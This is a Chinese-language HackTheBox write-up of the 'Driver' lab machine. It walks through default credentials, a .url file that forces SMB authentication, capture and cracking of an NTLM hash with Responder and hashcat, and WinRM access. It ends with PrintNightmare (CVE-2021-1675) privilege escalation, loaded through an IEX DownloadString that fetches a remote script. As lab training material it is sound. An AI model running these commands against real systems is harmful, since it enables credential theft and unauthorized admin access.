HackTheBox-Driver

admin 2022年8月27日23:47:06评论83 views字数 12182阅读40分36秒阅读模式

title: HackTheBox-Driver-PrintNightmare author: Mosaic Theory layout: true categories: 漏洞实验 tags:

  • • 打靶日记


The man with a new idea is a crank until the idea succeeds .

具有新想法的人在其想法实现之前是个怪人。

HackTheBox-Driver

Recon:

masscan在扫描Windows及其容易出现漏端口的行为,这是我无法接受的:

Nmap scan report for 10.10.11.106
Host is up (0.12s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorizedx0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-05-16T14:46:55
|_  start_date: 2022-05-16T14:39:15
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 255.20 seconds

80端口需要提供账号口令,而我没有:

HackTheBox-Driver

而其他端口都不被允许匿名访问。看起来突破口确实是在80,好吧,admin/admin进去了,其实就这一个能点,其他都是假按钮:

HackTheBox-Driver

随便提交一个文件,可以读取到HTTP请求包:

POST /fw_up.php HTTP/1.1
Host: 10.10.11.106
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------32797649710965608502761959682
Content-Length: 1306
Origin: http://10.10.11.106
DNT: 1
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://10.10.11.106/fw_up.php
Upgrade-Insecure-Requests: 1

-----------------------------32797649710965608502761959682
Content-Disposition: form-data; name="printers"
HTB DesignJet
-----------------------------32797649710965608502761959682
Content-Disposition: form-data; name="firmware"; filename="cacert.der"
Content-Type: application/x-x509-ca-cert

0‚¨0‚ 

会提示成功:

HackTheBox-Driver

看起来好像是什么都能传,介于是在内网环境,可以利用强制认证:

[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\10.10.16.7%USERNAME%.icon
IconIndex=1

创建一个.url文件,因为这种文件有个特性,登录用户在机器上看到那一刻就已经晚了:

>> sudo responder -I tun0                                           
[sudo] mosaictheory 的密码:
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.1.0

  Author: Laurent Gaffie ([email protected])
  To kill this script hit CTRL-C

HackTheBox-Driver

>> hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force

TONY::DRIVER:913a938f1fb463b5:ffa92e39b6201e8731a288ece8fc0fa4:0101000000000000008590db3e69d801a12e4b2e904c599d00000000020008004a0045005700370001001e00570049004e002d005500360032004a004d004f005000500053004a00550004003400570049004e002d005500360032004a004d004f005000500053004a0055002e004a004500570037002e004c004f00430041004c00030014004a004500570037002e004c004f00430041004c00050014004a004500570037002e004c004f00430041004c0007000800008590db3e69d80106000400020000000800300030000000000000000000000000200000af20d57f4b4348c88fd4acfac68f826ba8249ad294536a15de0a5899484cd0200a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003700000000000000000000000000:liltony

SMB没有更多的东西:

>> smbmap -H 10.10.11.106 -u tony -p liltony
[+] IP: 10.10.11.106:445 Name: 10.10.11.106                                      
        Disk                                                   Permissions Comment
    ----                                                   ----------- -------
    ADMIN$                                             NO ACCESS Remote Admin
    C$                                                 NO ACCESS Default share
    IPC$                                               READ ONLY Remote IPC

我可以直接链接5985 的winrm:

>> evil-winrm -i 10.10.11.106 -u tony -p "liltony"
*Evil-WinRMPS C:Userstony> cd Desktop
*Evil-WinRMPS C:UserstonyDesktop> ls


    Directory: C:UserstonyDesktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        5/16/2022   7:39 AM             34 user.txt


*Evil-WinRMPS C:UserstonyDesktop> cat user.txt
6..........................................

没什么权限信息,而且执行不了systeminfo:

*Evil-WinRMPS C:UserstonyDesktop> whoami /all

USER INFORMATION
----------------

User Name   SID
=========== ==============================================
drivertony S-1-5-21-3114857038-1253923253-2196841645-1003


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTINRemote Management Users        Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTINUsers                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYNETWORK                   Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITYAuthenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITYThis Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITYLocal account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITYNTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory LabelMedium Mandatory Level Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== =======
SeShutdownPrivilege           Shut down the system                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Enabled
SeTimeZonePrivilege           Change the time zone                 Enabled

*Evil-WinRMPS C:UserstonyDesktop> 

但可以通过Metasploit枚举:

msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.11.106 - Collecting local exploits for x64/windows...
[*] 10.10.11.106 - 32 exploit checks are being tried...
[+] 10.10.11.106 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.11.106 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.10.11.106 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.10.11.106 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.10.11.106 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 10.10.11.106 - exploit/windows/local/ricoh_driver_privesc: The target appears to be vulnerable. Ricoh driver directory has full permissions
[+] 10.10.11.106 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Post module execution completed

有个驱动加载的漏洞,与靶机主题吻合。

sf6 exploit(windows/local/ricoh_driver_privesc) > set session 1
session => 1
msf6 exploit(windows/local/ricoh_driver_privesc) > set LPORT 4444
LPORT => 4444
msf6 exploit(windows/local/ricoh_driver_privesc) > run

[*] Started reverse TCP handler on 10.10.16.7:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Ricoh driver directory has full permissions
[*] Adding printer gvYCW...
[*] Deleting printer gvYCW
[*] Exploit completed, but no session was created.

但是没回弹会话。

PrintNightmare

简单来讲,在windows系统中,如果要添加打印机驱动会被系统校验APD_INSTALL_WARNED_DRIVER 标志位,如果客户端尝试添加列表中的打印机驱动程序,但未设置此位,则服务器返回 ERROR_PRINTER_DRIVER_WARNED 错误代码。如果客户端尝试添加列表中的打印机驱动程序,并且设置了此位,则服务器尝试添加打印机驱动程序,而漏洞的本质便是低权限用户可以添加APD_INSTALL_WARNED_DRIVER 标志位使其让windows以驱动高权限加载用户的DLL。如需详细代码了解,请看转以下文章:

https://bbs.pediy.com/thread-271241.htm

导入漏洞脚本被拦截了:

*Evil-WinRM* PS C:UserstonyDocuments> Import-Module .CVE-2021-1675.ps1
File C:UserstonyDocumentsCVE-2021-1675.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ Import-Module .CVE-2021-1675.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : SecurityError: (:) [Import-Module], PSSecurityException
    + FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand
*Evil-WinRM* PS C:UserstonyDocuments> . .CVE-2021-1675.ps1
File C:UserstonyDocumentsCVE-2021-1675.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:3
+ . .CVE-2021-1675.ps1
+   ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : SecurityError: (:) [], PSSecurityException
    + FullyQualifiedErrorId : UnauthorizedAccess
*Evil-WinRM* PS C:UserstonyDocuments> 

但是可以绕过,远程加载:

*Evil-WinRM* PS C:UserstonyDocuments> Invoke-Expression (New-Object Net.WebClient).DownloadString("ht"+"tp://10.10.16.7/CVE-2021-1675.ps1")
*Evil-WinRM* PS C:UserstonyDocuments> Get-Command Invoke-Nightmare

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Function        Invoke-Nightmare

我可以利用该脚本添加个用户,这个用户会在本地管理员组中:

*Evil-WinRM* PS C:UserstonyDocuments> Invoke-Nightmare -NewUser "mosaic" -NewPassword "adminadmin"
[+] created payload at C:UserstonyAppDataLocalTempnightmare.dll
[+] using pDriverPath = "C:WindowsSystem32DriverStoreFileRepositoryntprint.inf_amd64_f66d9eed7e835e97Amd64mxdwdrv.dll"
[+] added user mosaic as local administrator
[+] deleting payload from C:UserstonyAppDataLocalTempnightmare.dll
*Evil-WinRM* PS C:UserstonyDocuments> net user mosaic
User name                    mosaic
Full Name                    mosaic
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/16/2022 9:26:38 AM
Password expires             Never
Password changeable          5/16/2022 9:26:38 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/16/2022 9:28:03 AM

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.

*Evil-WinRM* PS C:UserstonyDocuments> 

以新身份进行winrm会话:

>> evil-winrm -i 10.10.11.106 -u mosaic -p adminadmin

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:UsersmosaicDocuments> whoami
drivermosaic
*Evil-WinRM* PS C:UsersmosaicDocuments> cd ../../
*Evil-WinRM* PS C:Users> cd administrator
*Evil-WinRM* PS C:Usersadministrator> cd desktop
*Evil-WinRM* PS C:Usersadministratordesktop> type root.txt
f8.........................................


原文始发于微信公众号(老鑫安全):HackTheBox-Driver

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月27日23:47:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HackTheBox-Driverhttps://cn-sec.com/archives/1257545.html

发表评论

匿名网友 填写信息